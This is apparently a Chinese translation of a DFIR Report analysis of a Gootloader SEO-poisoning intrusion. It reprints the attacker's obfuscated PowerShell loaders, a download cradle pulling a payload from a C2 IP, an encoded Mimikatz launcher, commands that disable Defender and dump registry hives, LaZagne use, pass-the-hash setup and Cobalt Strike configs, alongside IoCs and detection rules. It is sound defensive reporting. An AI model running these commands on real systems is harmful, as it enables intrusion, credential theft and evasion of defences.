【DFIR报告翻译】SEO投毒 一个Gootloader的故事
2023-5-22 11:59:37 Author: Desync InfoSec(查看原文) 阅读量:25 收藏

摘要

今年2月份,我们发现了一起边界突破阶段使用了Gootloader(又名GootKit)工具的入侵事件。

入侵持续了两天,包括内网探测、权限维持、横向移动、内网信息收集、防御规避、窃取凭证以及远程控制活动。在最后阶段,攻击者使用了 RDP、WMI、Mimikatz、Lazagne、WMIExec 和 SharpHound进行横向移动获取权限。然后使用此访问权限来查看敏感文档。

Gootloader是一种分多阶段投递载荷的加载器,由Sophos公司在2021年3月份披露。攻击者利用SEO技术将带有恶意软件的钓鱼网站排名提升到搜索结果的靠前位置。用户可能会打开这些钓鱼网站并下载运行恶意软件。Gootloader的参考资料可以参阅:

推特账号@GootLoaderSites的研究人员公开了许多钓鱼网站相关情报和最新的C2地址。

技术汇总

本入侵案例起始于一个用户搜索关键字“Olymplus Plea Agreement?”,用户点击了搜索结果列表中的第二条,导致恶意的js代码被下载和执行(详细参考边界突破章节)。在执行阶段,Gootloader使用编码后的PowerShell代码加载Cobalt Strike到内存中,并利用注册表和计划任务进行权限维持。

边界突破15分钟后,攻击者使用PowerShell实现的SharpHound(BloodHound) 进行AD域探测。并使用Cobalt Strike 的PowerShell载荷横向移动到另一台主机中。攻击者禁用了Windows Defender,然后运行另一个Cobalt Strike载荷,连接到不同的C2服务器。之后攻击者运行LaZagne窃取了失陷主机中的所有密码。在跳板机中攻击者使用PowerShell运行Mimikatz窃取了系统凭证。

攻击者利用窃取的系统凭证RDP登录到其他终端并执行Cobalt Strike 载荷。攻击者使用RDP和远程WMI管理进行横向移动。攻击停止了4个小时后,攻击者通过WMI在域控服务器上开启了受限管理模式并通过RDP登录了域控服务器。

攻击者在域控服务器中再次运行Lazagne,获取了大量登录凭证。我们发现攻击者开始寻找文件共享服务,通过RDP逐一翻看文件内容,并最终找到法律和保险相关文档。

在入侵的第二天也是最后一天,攻击者通过 RDP 会话从域控制器运行 Advanced IP Scanner。此外,他们还检查了文件服务器和备份服务器,在离开网络之前寻找更多敏感数据。

时间线
01
边界突破

本次入侵起始于用户点击并执行了Gootloader恶意软件,下面是受害者由于SEO技术影响而执行Gootloader恶意软件的过程视频。

https://youtu.be/IdR-tlv7w48

用户双击打开zip文件时,便会触发恶意JavaScript代码执行

02
执行

Gootloader会创建以下两个注册表键值

HKCU:\SOFTWARE\Microsoft\Phone\UsernameHKCU:\SOFTWARE\Microsoft\Phone\Username0

第一个填充有编码的 Cobalt Strike 有效负载,后者用于存储名为 powershell.dll 的 .NET 加载程序。

在创建注册表之后,开始执行PowerShell代码

"powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" NgAxA"DQANgA0ADkA"MgAxADEAOwB"zAGwAZQBlAHAAIAAtAHMAIAA4AD"MA"OwAkAG8AcABqAD0ARwBlAH"QA"LQBJAHQ"AZQBtAFAA"cg"B"vAHAAZQ"ByA"HQAeQ"Ag"AC0"AcABh"AH"QAaAAg"ACgAIg"BoAGsA"IgArACIAYwB1A"Do"AX"ABz"AG8"AZgA"iACsA"IgB0AH"c"AIgAr"ACIAY"QB"y"AGUAXABtAGkAYwAiA"CsAI"gB"yAG"8AcwAiAC"sA"IgB"v"AG"YAd"ABc"AFAAa"AB"vAG4AZQBcACIAKwBbAE"UAbgB2"AGkAc"gBv"AG4"A"bQBlAG4"AdA"B"dADo"AOgAo"ACIAdQBzA"GUAIgArAC"IAcgBuACIAK"wAiAGEAb"QBlACIAKQArA"C"IAM"AAi"AC"kAOwB"mAG8AcgAg"ACg"A"J"AB1AG8APQAw"ADs"AJAB1AG8AIAA"tAG"wAZQAgADc"A"N"gA"wADsA"JAB1AG8AK"wArA"CkAewBUAHIAeQ"B7A"CQA"b"QBwA"GQAKw"A9A"CQA"bwB"wAGo"ALgA"kAHU"AbwB9AEM"AY"QB"0A"GMAaAB7AH0AfQA7ACQAdQB"vAD0A"M"AA7AHc"AaAB"pAGwAZQAo"ACQAdAByAH"U"AZQApA"H"sAJAB1AG"8AKwA"r"A"DsAJABrAG8APQB"bAG"0AY"QB0AGgAX"QA6ADo"AK"AAi"AH"MAcQAiACs"AIgByAHQAI"g"ApACgAJ"AB1A"G8"AKQA"7A"GkA"ZgAoACQA"awBvACA"ALQB"lAHEAIAAxADAAM"A"AwACkAew"B"iAHIA"Z"Q"Bh"AGsAfQB9A"CQAeQB"sAD0AJABtAH"A"AZAAuAH"IAZQBwA"GwAY"QB"jA"GU"A"KAA"iACMAIgAsACQAawBv"ACk"AOwA"kAGsAagB"iAD"0AWwB"iA"HkA"dA"Bl"AFsA"XQBdA"DoAOgAo"ACIAb"gBlACIAKw"AiA"HcA"IgApACgAJAB5AGwA"L"gBM"AG"UA"bgBn"A"HQAaAAvADIAKQA7"AGYAbwB"yACg"A"JA"B"1A"G8A"P"QAwADsAJAB1AG"8"AIAAt"A"G"w"A"dAAgA"CQA"eQ"B"sAC4AT"ABlAG4AZwB0AG"gAOwAkAHUAb"wArAD"0A"MgA"pAH"s"AJABrAGoAY"gBbACQ"AdQBvAC8AMgBdAD0AWwBjAG8AbgB"2"AGUAcgB0A"F"0"A"OgA"6"ACgAIgBU"AG8AQg"AiACsA"IgB5AHQAZ"Q"AiACkAKA"AkAH"kAbAAuA"FM"Ad"QBiAHMA"dAB"yAGkAb"gBnACgAJAB1AG8"AL"AAy"A"CkA"LAAoADIAK"gA4AC"kAKQB9AFsA"cg"Bl"AGYAb"ABlAGM"AdA"BpAG8"AbgAuAGEAcw"BzAGUAbQBiA"GwAeQBd"ADo"AOgAoAC"IAT"ABv"AC"IA"K"wAiAGEA"Z"AA"i"AC"kAKA"A"kAGsAagB"iACkAO"wBbAE8AcA"Bl"AG4AXQA6"A"D"oA"KAAiAF"QAZQAiA"C"sAIgBzA"H"Q"AIgAp"A"Cg"AKQA7ADYA"MQA"xAD"gAOQA"4ADUAN"AA0AD"sA

PowerShell代码会从HKCU\SOFTWARE\Microsoft\Phone|username下将.NET加载器解压出来并加载到内存中。

614649211; sleep -s 83; $opj=Get-ItemProperty -path ("hkcu:\software\microsoft\Phone\"+[Environment]::("username")+"0"); for ($uo=0;$uo -le 760;$uo++) { Try{$mpd+=$opj.$uo}Catch{} }; $uo=0; while($true) { $uo++;$ko=[math]::("sqrt")($uo); if($ko -eq 1000){break} } $yl=$mpd.replace("#",$ko); $kjb=[byte[]]::("new")($yl.Length/2); for($uo=0;$uo -lt $yl.Length;$uo+=2){ $kjb[$uo/2]=[convert]::("ToByte")($yl.Substring($uo,2),(2*8)) } [reflection.assembly]::("Load")($kjb); [Open]::("Test")(); 6118985

可以使用CyberChef 工具解码powershell代码。PowerShell代码执行完成后会调用.NET加载器读取HKCU\SOFTWARE\Microsoft\Phone\Username下的内容,并将Cobalt Strike载荷解码加载到内存中。

PowerShell代码使用的编码方式比较简单,一个字母对应一个十六进制字符或三个0.

q->000v->0w->1r->2t->3y->4u->5i->6o->7p->8s->9q->Ah->Bj->Ck->Dl->Ez->F

下图展示了.NET加载器的核心逻辑。

下图为Gootloader执行后的整个逻辑

微软提供了一个配置方式,用于禁止JavaScript和VBScript下载可执行内容。恶意代码执行完成后,Cobalt Strike成功上线,攻击者开始通过RDP访问多个失陷系统。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://37.120.198.225:80/trio'))"
03
权限维持

Gootloader的JavaScript代码调用以下PowerShell代码

PowerShell代码创建计划任务,当用户登录时会执行保存在注册表中的PowerShell代码

6876813;$a="NgAxADQANgA0ADkAMgAxADEAOwBzAGwAZQBlAHAAIAAtAHMAIAA4ADMAOwAkAG8AcABqAD0ARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACgAIgBoAGsAIgArACIAYwB1ADoAXABzAG8AZgAiACsAIgB0AHcAIgArACIAYQByAGUAXABtAGkAYwAiACsAIgByAG8AcwAiACsAIgBvAGYAdABcAFAAaABvAG4AZQBcACIAKwBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgAoACIAdQBzAGUAIgArACIAcgBuACIAKwAiAGEAbQBlACIAKQArACIAMAAiACkAOwBmAG8AcgAgACgAJAB1AG8APQAwADsAJAB1AG8AIAAtAGwAZQAgADcANgAwADsAJAB1AG8AKwArACkAewBUAHIAeQB7ACQAbQBwAGQAKwA9ACQAbwBwAGoALgAkAHUAbwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAdQBvAD0AMAA7AHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsAJAB1AG8AKwArADsAJABrAG8APQBbAG0AYQB0AGgAXQA6ADoAKAAiAHMAcQAiACsAIgByAHQAIgApACgAJAB1AG8AKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAeQBsAD0AJABtAHAAZAAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGsAagBiAD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJAB5AGwALgBMAGUAbgBnAHQAaAAvADIAKQA7AGYAbwByACgAJAB1AG8APQAwADsAJAB1AG8AIAAtAGwAdAAgACQAeQBsAC4ATABlAG4AZwB0AGgAOwAkAHUAbwArAD0AMgApAHsAJABrAGoAYgBbACQAdQBvAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAHkAbAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJAB1AG8ALAAyACkALAAoADIAKgA4ACkAKQB9AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvACIAKwAiAGEAZAAiACkAKAAkAGsAagBiACkAOwBbAE8AcABlAG4AXQA6ADoAKAAiAFQAZQAiACsAIgBzAHQAIgApACgAKQA7ADYAMQAxADgAOQA4ADUANAA0ADsA";
$u=$env:USERNAME;Register-ScheduledTask $u -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E ([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) -Ar ("-w h -e "+$a)) -Tr (New-ScheduledTaskTrigger -AtL -U $u));
30687851

解码后如下:

6876813;614649211;$a = "614649211";sleep - s 83;$opj = Get - ItemProperty - path("hkcu:\software\microsoft\Phone\""+[Environment]::(" username ")+" 0 "); for ($uo = 0; $uo - le 760; $uo ++) {  Try {    $mpd += $opj.$uo  }  Catch {}};$uo = 0;while ($true) {  $uo ++;  $ko = [math]::("sqrt")($uo);  if ($ko - eq 1000) {    break  }}$yl = $mpd.replace("#", $ko);$kjb = [byte[]]::("new")($yl.Length / 2);for ($uo = 0; $uo - lt $yl.Length; $uo += 2) {  $kjb[$uo / 2] = [convert]::("ToByte")($yl.Substring($uo, 2), (2 * 8))}[reflection.assembly]::("Load")($kjb);[Open]::("Test")();611898544;$u = $env : USERNAME;Register - ScheduledTask $u - In(New - ScheduledTask - Ac(New - ScheduledTaskAction - E([Diagnostics.Process]::GetCurrentProcess().MainModule.FileName) - Ar("-w h -e " + $a)) - Tr(New - ScheduledTaskTrigger - AtL - U $u));306878516;

创建计划任务的配置文件如下

04
防护绕过

攻击者在多个失陷主机中删除了Windows Defender的定时扫描计划任务。


schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /fschtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /fschtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /fschtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f

此外,攻击者还使用PowerShell 禁用 Microsoft Defender 中内置的多项安全功能。

Set-MpPreference -DisableRealtimeMonitoring $trueSet-MpPreference -DisableArchiveScanning $trueSet-MpPreference -DisableBehaviorMonitoring $trueSet-MpPreference -DisableIOAVProtection $trueSet-MpPreference -DisableIntrusionPreventionSystem $trueSet-MpPreference -DisableScanningNetworkFiles $trueSet-MpPreference -MAPSReporting 0Set-MpPreference -DisableCatchupFullScan $TrueSet-MpPreference -DisableCatchupQuickScan $True

与其他入侵案例相似,我们发现攻击者在跳板机中使用rundll32将Cobalt Strike 载荷加载到内存中。

从跳板机的内存快照中可以发现rundll32的内存区域被设置为PAGE_EXECUTE_READWRITE可读写执行权限。并且存在MZ头部。

在入侵期间我们也观察到攻击者使用默认的Cobalt Strike命名管道。

PipeName: \msagent_ldPipeName: \1ea887

攻击者使用了双重编码的PowerShell代码,其中第一层编码使用了十六进制和XOR异或编码

第二层编码是使用base64编码的gzip数据。

解码此脚本会发现它是一个公开可用的WMIExec 脚本,用于运行远程 WMI 查询。

05
凭证窃取

Gootloader加载了一个名为“mi.ps1” 的恶意PowerShell脚本

另一个XOR编码的PowerShell代码调用mi.ps1脚本

powershell -nop -noni -ep bypass -w h -c ""$t=([type]'Convert');&([scriptblock]::Create(($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name)('NWYsOV90Zjxec3t0cmUxX3RlP0Z0c1J9eHR/ZTgqNWQsNWY/OTk5OTVmOD9BYl5ze3RyZT9cdGV5fnViOG0uajlYZXR8MUdwY3hwc310K044P0dwfWR0P19wfHQ8cn14enQ2VTt2Nmw4P19wfHQ4P1h/Z356dDk2eWVlYSs+PiAjJj8hPyE/ICskJiYhIj42OCo3OVVYQzFQfXhwYis+WDtJODk1ZDgqMVh8YX5jZTxcfnVkfXQxUitNRGJ0Y2JNaGRieXA/fH5ifXRoTVh/Z356dDxGXFhUaXRyP2FiICoxWH9nfnp0PEZcWFRpdHIxPEVwY3Z0ZTFCWVBDVCAxPFV+fHB4fzFhY354f2JkY3B/cnQ/fX5ycH0xPERidGN/cHx0MVh/YmVwfX10YzE8WXBieTF0IyF0KSByJHIhJ3JydyMpKSUmJXIkKSB3ICIlIyJzKDE8Un58fHB/dTEzYX5mdGNieXR9fT90aXQxX3RmPFhldHxBY35hdGNlaDE8QXBleTE2WVpdXCtNQmhiZXR8TVJkY2N0f2VSfn9lY359QnRlTVJ+f2Vjfn1NXWJwNjE8X3B8dDE2VXhicHN9dEN0YmVjeHJldHVQdXx4fzYxPEdwfWR0MSExPEFjfmF0Y2VoRWhhdDFVRl5DVTMxPGd0Y3N+YnQ=')|%{$_-bxor17}|%{[char]$_})-join''))""

这个CyberChef脚本可以解码上述PowerShell代码,解码后为“Invoke-Mimikatz”,一个基于PowerShell实现的Mimikatz脚本工具,用于直接将Mimikatz DLL模块加载到内存中。

$u=('http://127.0.0.1:22201/'|%{(IRM $_)});$u|&(GCM I*e-E*); Import-Module C:\Users\<redacted>\mi.ps1; Invoke-Mimikatz -ComputerName <redacted>

通过PowerShell日志事件ID:4103,我们可以观察到攻击者成功读取了登录凭证。

此外,攻击者使用凭证窃取工具“LaZagne”(重命名为 ls.exe)带参数“-all”进行凭证窃取

ls.exe all -oN -output C:\Users\REDACTED

这个工具会窃取浏览器、LSA secret、内存凭证、Keepass、WinSCP、远程桌面、OpenVPN、Git等程序的登录凭证。并存储在c:\users\目录下。如果以管理员权限运行LaZagne,还能够读取到注册表中存储的登录凭证。

攻击者在其他失陷主机中运行的命令如下:

cmd.exe /c "reg.exe save hklm\sam c:\users\REDACTED\appdata\local\temp\1\dznuxujzr"cmd.exe /c "reg.exe save hklm\system c:\users\REDACTED\appdata\local\temp\1\mkffdg"cmd.exe /c "reg.exe save hklm\security c:\users\REDACTED\appdata\local\temp\1\iszmqwmjemt"
06
内网探测

攻击者在跳板机中,通过Cobalt Strike载荷调用PowerShell,执行SharpHound工具对AD域进行枚举

powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgAxADAAMAA0ADkALwAnACkAOwAgAEkAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZAAgAC0AQwBvAGwAbABlAGMAdABpAG8AbgBNAGUAdABoAG8AZAAgAEEAbABsAA==

同时,攻击者还通过执行WMI命令探测主机中的防病毒程序

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

攻击者在横向移动到域控服务器前,对域控服务器执行以下命令

powershell.exe ls C:\ > C:\file.txt

在RDP 访问时,为了尝试收集有关主机的更多信息,攻击者使用 PowerShell 在他们转向的其中一台主机上运行 systeminfo。在最后一天,在他们离开网络之前,攻击者使用 Advanced IP Scanner 扫描整个网络以查找以下开放端口:

21,80,135,443,445,3389,8080,56133,58000,58157,58294,58682,60234,60461,64502

07
横向移动

与其他入侵案例相似,攻击者横向移动时,通过创建Windows系统服务的方式部署Cobalt Strike载荷

攻击者使用SMB协议在网络中传递Cobalt Strike可执行程序。

这些可执行文件通过远程服务执行,在Windows 事件ID:7045中可以看到

在部署 Cobalt Strike beacon之后,攻击者还使用 RDP 与网络上的各种主机建立交互式会话。这些会话的一个重要方面是威胁参与者使用“受限管理模式”进行身份验证。

受限管理模式可以被认为是一把双刃剑;虽然它可以防止凭据盗窃,但它也使攻击者能够使用 RDP 执行哈希传递攻击。换句话说,启用受限管理模式后,只需要远程桌面用户的 NTLM 哈希即可建立有效的 RDP 会话,而无需拥有明文密码。攻击者试图同时使用 Invoke-WMIExec 和 psexec 来启用“受限管理模式”。

psexec \\<redacted> -u <redacted>\<redacted> -p <redacted> reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:47961/'|%%{(IRM $_)});&(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\<redacted>\Invoke-WMIExec.ps1; Invoke-WMIExec -Target <redacted> -Domain <redacted> -Username <redacted> -Hash <redacted> -Command "powershell.exe New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD" -verbose

Windows事件ID:4624日志,包含Restricted Admin Mode的日志,记录了启动受限管理模式成功

08
信息收集

攻击者通过RDP会话在多个服务器中访问敏感文件,例如直接在系统中打开文件

通过分析注册表Shellbags可以发现攻击者访问过多个文件共享的记录

09
远程控制

Gootloader

Gootloader下载载荷的URL可以通过HP 威胁分析团队提供的脚本进行解码

hxxps://kakiosk.adsparkdev[.]com/test.php?hjkiofilihyl=hxxps://jp.imonitorsoft[.]com/test.php?hjkiofilihyl=hxxps://junk-bros[.]com/test.php?hjkiofilihyl=

在入侵期间Gootloader外联到35.206.117.64:443 kakiosk[.]adsparkdev[.]com.

Ja3:a0e9f5d64349fb13191bc781f81f42e1Ja3s:567bb420d39046dbfd1f68b558d86382Certificate: [d8:85:d1:48:a2:99:f5:ee:9d:a4:3e:01:1c:b0:ec:12:e5:23:7d:61 ]Not Before: 2022/01/05 09:25:33 UTC Not After: 2022/04/05 09:25:32 UTC Issuer Org: Let's Encrypt Subject Common: kakiosk.adsparkdev.com [kakiosk.adsparkdev.com ,www.kakiosk.adsparkdev.com ]Public Algorithm: rsaEncryption

Cobalt Strike

146.70.78.43

Cobalt Strike server TLS配置

146.70.78.43Ja3:72a589da586844d7f0818ce684948eeaJa3s:f176ba63b4d68e576b5ba345bec2c7b7Serial Number: 146473198 (0x8bb00ee)Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4FNot Before: May 20 18:26:24 2015 GMTNot After: May 17 18:26:24 2025 GMTIssuer:  C=, ST=, L=, O=, OU=, CN=Subject:  C=, ST=, L=, O=, OU=, CN=Public Algorithm: rsaEncryption

Cobalt Strike Beacon配置

Cobalt Strike Beacon:  x86:    beacon_type: HTTPS    dns-beacon.strategy_fail_seconds: -1    dns-beacon.strategy_fail_x: -1    dns-beacon.strategy_rotate_seconds: -1    http-get.client:      Cookie    http-get.uri: 146.70.78.43,/visit.js    http-get.verb: GET    http-post.client:      Content-Type: application/octet-stream      id    http-post.uri: /submit.php    http-post.verb: POST    maxgetsize: 1048576    port: 443    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe    process-inject.execute:      CreateThread      SetThreadContext      CreateRemoteThread      RtlCreateUserThread    process-inject.startrwx: 64    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648    process-inject.userwx: 64    proxy.behavior: 2 (Use IE settings)    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64    sleeptime: 60000    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; yie9)    uses_cookies: 1    watermark: 1580103824  x64:    beacon_type: HTTPS    dns-beacon.strategy_fail_seconds: -1    dns-beacon.strategy_fail_x: -1    dns-beacon.strategy_rotate_seconds: -1    http-get.client:      Cookie    http-get.uri: 146.70.78.43,/fwlink    http-get.verb: GET    http-post.client:      Content-Type: application/octet-stream      id    http-post.uri: /submit.php    http-post.verb: POST    maxgetsize: 1048576    port: 443    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe    process-inject.execute:      CreateThread      SetThreadContext      CreateRemoteThread      RtlCreateUserThread    process-inject.startrwx: 64    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648    process-inject.userwx: 64    proxy.behavior: 2 (Use IE settings)    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64    sleeptime: 60000    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENXA)    uses_cookies: 1    watermark: 1580103824

37.120.198.225

Cobalt Strike server TLS 配置

Ja3:72a589da586844d7f0818ce684948eeaJa3s:f176ba63b4d68e576b5ba345bec2c7b7Serial Number: 146473198 (0x8bb00ee)Certificate: 73:6B:5E:DB:CF:C9:19:1D:5B:D0:1F:8C:E3:AB:56:38:18:9F:02:4FNot Before: May 20 18:26:24 2015 GMTNot After : May 17 18:26:24 2025 GMTIssuer: C=, ST=, L=, O=, OU=, CN=Subject: C=, ST=, L=, O=, OU=, CN=Public Algorithm: rsaEncryption

Cobalt Strike Beacon配置

Cobalt Strike Beacon:  x86:    beacon_type: HTTPS    dns-beacon.strategy_fail_seconds: -1    dns-beacon.strategy_fail_x: -1    dns-beacon.strategy_rotate_seconds: -1    http-get.client:      Cookie    http-get.uri: 37.120.198.225,/cm    http-get.verb: GET    http-post.client:      Content-Type: application/octet-stream      id    http-post.uri: /submit.php    http-post.verb: POST    maxgetsize: 1048576    port: 443    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe    process-inject.execute:      CreateThread      SetThreadContext      CreateRemoteThread      RtlCreateUserThread    process-inject.startrwx: 64    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648    process-inject.userwx: 64    proxy.behavior: 2 (Use IE settings)    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64    sleeptime: 60000    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)    uses_cookies: 1    watermark: 1580103824  x64:    beacon_type: HTTPS    dns-beacon.strategy_fail_seconds: -1    dns-beacon.strategy_fail_x: -1    dns-beacon.strategy_rotate_seconds: -1    http-get.client:      Cookie    http-get.uri: 37.120.198.225,/ptj    http-get.verb: GET    http-post.client:      Content-Type: application/octet-stream      id    http-post.uri: /submit.php    http-post.verb: POST    maxgetsize: 1048576    port: 443    post-ex.spawnto_x64: %windir%\sysnative\rundll32.exe    post-ex.spawnto_x86: %windir%\syswow64\rundll32.exe    process-inject.execute:      CreateThread      SetThreadContext      CreateRemoteThread      RtlCreateUserThread    process-inject.startrwx: 64    process-inject.stub: 222b8f27dbdfba8ddd559eeca27ea648    process-inject.userwx: 64    proxy.behavior: 2 (Use IE settings)    server.publickey_md5: defb5d95ce99e1ebbf421a1a38d9cb64    sleeptime: 60000    useragent_header: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)    uses_cookies: 1    watermark: 1580103824

Real Intelligence Threat Analytics (RITA)成功检测出了这个IP的C2通信

Volatility解析出了Cobalt Strike C2通信行为

Volatility 3 Framework 2.0.0
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created...0x948431c46010 TCPv4 10.X.X.X 52670 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe 0x948431e19010 TCPv4 10.X.X.X 63723 146.70.78.43 443 CLOSED 3420 rundll32.exe 0x9484337f18a0 TCPv4 10.X.X.X 52697 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe 0x948435102050 TCPv4 10.X.X.X 52689 146.70.78.43 443 CLOSE_WAIT 3420 rundll32.exe ...
10
目标达成

攻击者被及时驱逐出网络,并未产生其他影响。

IoCs

Gootloader

https://kakiosk.adsparkdev[.]com

https://jp.imonitorsoft[.]com

https://junk-bros[.]com

35.206.117.64:443

Cobalt Strike

146.70.78.43:443

37.120.198.225:443

olympus_plea_agreement 34603 .js

d7d3e1c76d5e2fa9f7253c8ababd6349

724013ea6906a3122698fd125f55546eac0c1fe0

6e141779a4695a637682d64f7bc09973bb82cd24211b2020c8c1648cdb41001b

olympus plea agreement(46196).zip

b50333ff4e5cbcda8b88ce109e882eeb

44589fc2a4d1379bee93282bbdb16acbaf762a45

7d93b3531f5ab7ef8d68fb3d06f57e889143654de4ba661e5975dae9679bbb2c

mi.ps1

acef25c1f6a7da349e62b365c05ae60c

c5d134a96ca4d33e96fb0ab68cf3139a95cf8071

d00edf5b9a9a23d3f891afd51260b3356214655a73e1a361701cda161798ea0b

Invoke-WMIExec.ps1

b4626a335789e457ea48e56dfbf39710

62a7656d81789591358796100390799e83428519

c4939f6ad41d4f83b427db797aaca106b865b6356b1db3b7c63b995085457222

ls.exe

87ae2a50ba94f45da39ec7673d71547c

dfa0b4206abede8f441fcdc8155803b8967e035c

8764131983eac23033c460833de5e439a4c475ad94cfd561d80cb62f86ff50a4

Suricata规则

ET HUNTING Suspicious Empty SSL Certificate - Observed in Cobalt Strike 

ET MALWARE Meterpreter or Other Reverse Shell SSL Cert

sigma

Custom Sigma rules

Deleting Windows Defender scheduled tasks

Enabling restricted admin mode

Using powershell specific download cradle OneLiner

Using Lazagne to dump credentials

Sigma repo rules

Bloodhound Detection – https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml
Powershell download –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
Defender Disable via Powershell –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
Creation of Scheduled Task via Powershell –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml
LaZagne LSASS Access –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml
Systeminfo Discovery –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml
CobaltStrike Named Pipe –
https://github.com/SigmaHQ/sigma/blob/7fb8272f948cc0b528fe7bd36df36449f74b2266/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
Malicious PowerShell Commandlets –
https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
Suspicious Service Installation –
https://github.com/SigmaHQ/sigma/blob/7d48d0e838b76f3fb5bc623e7ec45343cfac9c88/rules/windows/builtin/system/win_susp_service_installation.yml
Suspicious XOR Encoded PowerShell Command Line –
https://github.com/SigmaHQ/sigma/blob/becf3baeb4f6313bf267f7e8d6e9808fc0fc059c/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml
Too Long PowerShell Commandlines –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml
PowerShell Network Connections –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
Rundll32 Internet Connection –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
Mimikatz Use –
https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_alert_mimikatz_keywords.yml

Yara

Custom Yara rule

参考链接

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://www.sentinelone.com/labs/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/

https://redcanary.com/threat-detection-report/threats/gootkit/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://twitter.com/GootLoaderSites

https://github.com/AlessandroZ/LaZagne

https://github.com/The-DFIR-Report/cyberchef-recipes/blob/main/SEO%20Poisoning%20-%20A%20GootLoader%20Story

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-javascript-or-vbscript-from-launching-downloaded-executable-content

